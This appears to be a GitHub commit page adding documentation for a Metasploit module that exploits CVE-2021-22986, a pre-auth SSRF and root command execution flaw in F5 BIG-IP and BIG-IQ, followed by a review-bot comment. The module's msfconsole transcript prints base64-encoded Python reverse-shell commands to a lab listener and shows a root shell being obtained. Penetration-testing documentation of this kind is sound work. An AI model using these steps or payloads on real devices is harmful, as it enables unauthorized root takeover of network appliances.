Commit 2cbd1a6
Land rapid7#14935, add F5 iControl REST API SSRF RCE
2 parents 6549c12 + 69a0c94 commit 2cbd1a6

2 files changed

+448
-0
lines changed
Lines changed: 122 additions & 0 deletions
@@ -0,0 +1,122 @@
1+
## Vulnerable Application
2+
3+
### Description
4+
5+
This module exploits a pre-auth SSRF in the F5 iControl REST API's
6+
`/mgmt/shared/authn/login` endpoint to generate an `X-F5-Auth-Token` that
7+
can be used to execute root commands on an affected BIG-IP or BIG-IQ
8+
device. This vulnerability is known as CVE-2021-22986.
9+
10+
CVE-2021-22986 affects the following BIG-IP versions:
11+
12+
* 12.1.0 - 12.1.5
13+
* 13.1.0 - 13.1.3
14+
* 14.1.0 - 14.1.3
15+
* 15.1.0 - 15.1.2
16+
* 16.0.0 - 16.0.1
17+
18+
And the following BIG-IQ versions:
19+
20+
* 6.0.0 - 6.1.0
21+
* 7.0.0
22+
* 7.1.0
23+
24+
Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.
25+
26+
### Setup
27+
28+
Import a vulnerable BIG-IP or BIG-IQ OVA, such as
29+
`BIGIP-16.0.1-0.0.3.ALL-vmware.ova`, into your desired hypervisor. Boot
30+
the virtual appliance, and it should be exploitable out of the box once
31+
it's up.
32+
33+
## Verification Steps
34+
35+
Follow [Setup](#setup) and [Scenarios](#scenarios).
36+
37+
## Targets
38+
39+
### 0
40+
41+
This executes a Unix command.
42+
43+
### 1
44+
45+
This uses a Linux dropper to execute code.
46+
47+
## Options
48+
49+
### USERNAME
50+
51+
Set this to a valid admin username. Defaults to `admin`.
52+
53+
### ENDPOINT
54+
55+
Set this to a custom token generation endpoint. Random if unset.
56+
57+
## Scenarios
58+
59+
### BIG-IP Virtual Edition 16.0.1 in VMware Fusion
60+
61+
```
62+
msf6 > use exploit/linux/http/f5_icontrol_rest_ssrf_rce
63+
[*] Using configured payload cmd/unix/reverse_python_ssl
64+
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > options
65+
66+
Module options (exploit/linux/http/f5_icontrol_rest_ssrf_rce):
67+
68+
Name Current Setting Required Description
69+
---- --------------- -------- -----------
70+
ENDPOINT no Custom token generation endpoint
71+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
72+
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
73+
RPORT 443 yes The target port (TCP)
74+
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
75+
SRVPORT 8080 yes The local port to listen on.
76+
SSL true no Negotiate SSL/TLS for outgoing connections
77+
SSLCert no Path to a custom SSL certificate (default is randomly generated)
78+
TARGETURI / yes Base path
79+
URIPATH no The URI to use for this exploit (default is random)
80+
USERNAME admin yes Valid admin username
81+
VHOST no HTTP server virtual host
82+
83+
84+
Payload options (cmd/unix/reverse_python_ssl):
85+
86+
Name Current Setting Required Description
87+
---- --------------- -------- -----------
88+
LHOST yes The listen address (an interface may be specified)
89+
LPORT 4444 yes The listen port
90+
91+
92+
Exploit target:
93+
94+
Id Name
95+
-- ----
96+
0 Unix Command
97+
98+
99+
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set rhosts 192.168.123.134
100+
rhosts => 192.168.123.134
101+
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set lhost 192.168.123.1
102+
lhost => 192.168.123.1
103+
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > run
104+
105+
[+] python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMTIzLjEnLDQ0NDQpKQpzPXNzbC53cmFwX3NvY2tldChzbykKcU49RmFsc2UKd2hpbGUgbm90IHFOOgoJZGF0YT1zLnJlY3YoMTAyNCkKCWlmIGxlbihkYXRhKT09MDoKCQlxTiA9IFRydWUKCXByb2M9c3VicHJvY2Vzcy5Qb3BlbihkYXRhLHNoZWxsPVRydWUsc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSxzdGRlcnI9c3VicHJvY2Vzcy5QSVBFLHN0ZGluPXN1YnByb2Nlc3MuUElQRSkKCXN0ZG91dF92YWx1ZT1wcm9jLnN0ZG91dC5yZWFkKCkgKyBwcm9jLnN0ZGVyci5yZWFkKCkKCXMuc2VuZChzdGRvdXRfdmFsdWUpCg==')[0]))"
106+
[*] Started reverse SSL handler on 192.168.123.1:4444
107+
[*] Executing automatic check (disable AutoCheck to override)
108+
[*] Generating token via SSRF...
109+
[*] Username: admin
110+
[*] Endpoint: /tm/analytics/proc-cpu/generate-report/indexing
111+
[+] Successfully generated token: CDDASK5TXQN246AJVZNAAPM7NS
112+
[+] The target is vulnerable.
113+
[*] Executing Unix Command for cmd/unix/reverse_python_ssl
114+
[*] Executing command: eval $(echo cHl0aG9uIC1jICJleGVjKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX2ltcG9ydF9fKCdjb2RlY3MnKS5nZXRlbmNvZGVyKCd1dGYtOCcpKCdhVzF3YjNKMElITnZZMnRsZEN4emRXSndjbTlqWlhOekxHOXpMSE56YkFwemJ6MXpiMk5yWlhRdWMyOWphMlYwS0hOdlkydGxkQzVCUmw5SlRrVlVMSE52WTJ0bGRDNVRUME5MWDFOVVVrVkJUU2tLYzI4dVkyOXVibVZqZENnb0p6RTVNaTR4TmpndU1USXpMakVuTERRME5EUXBLUXB6UFhOemJDNTNjbUZ3WDNOdlkydGxkQ2h6YnlrS1NIazlSbUZzYzJVS2QyaHBiR1VnYm05MElFaDVPZ29KWkdGMFlUMXpMbkpsWTNZb01UQXlOQ2tLQ1dsbUlHeGxiaWhrWVhSaEtUMDlNRG9LQ1FsSWVTQTlJRlJ5ZFdVS0NYQnliMk05YzNWaWNISnZZMlZ6Y3k1UWIzQmxiaWhrWVhSaExITm9aV3hzUFZSeWRXVXNjM1JrYjNWMFBYTjFZbkJ5YjJObGMzTXVVRWxRUlN4emRHUmxjbkk5YzNWaWNISnZZMlZ6Y3k1UVNWQkZMSE4wWkdsdVBYTjFZbkJ5YjJObGMzTXVVRWxRUlNrS0NYTjBaRzkxZEY5MllXeDFaVDF3Y205akxuTjBaRzkxZEM1eVpXRmtLQ2tnS3lCd2NtOWpMbk4wWkdWeWNpNXlaV0ZrS0NrS0NYTXVjMlZ1WkNoemRHUnZkWFJmZG1Gc2RXVXBDZz09JylbMF0pKSI= | base64 -d)
115+
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.134:40632) at 2021-03-30 17:30:28 -0500
116+
[!] Command execution timed out
117+
118+
id
119+
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
120+
uname -a
121+
Linux localhost.localdomain 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Tue Oct 20 10:03:05 PDT 2020 x86_64 x86_64 x86_64 GNU/Linux
122+
```
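Review bot: the `## Verification Steps` section only says "Follow [Setup](#setup) and [Scenarios](#scenarios)", which leaves the reader to reverse-engineer the procedure from the transcript; list the concrete steps (boot the appliance, `use exploit/linux/http/f5_icontrol_rest_ssrf_rce`, `set rhosts`, `set lhost`, `run`, confirm the `uid=0(root)` shell) and state plainly that only BIG-IP Virtual Edition 16.0.1 was tested while the BIG-IQ 6.0.0 - 7.1.0 versions are listed as affected but untested. The `### ENDPOINT` option is documented only as "Random if unset"; one sentence on what the endpoint is used for and why it is randomized (the transcript shows `[*] Endpoint: /tm/analytics/proc-cpu/generate-report/indexing`) would make the option usable, and a links or references section pointing at the vendor advisory for CVE-2021-22986 is missing. Finally, the transcript shows `[!] Command execution timed out` immediately after `Command shell session 1 opened`; a short note on whether that line is expected would stop readers from taking it as a failure.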
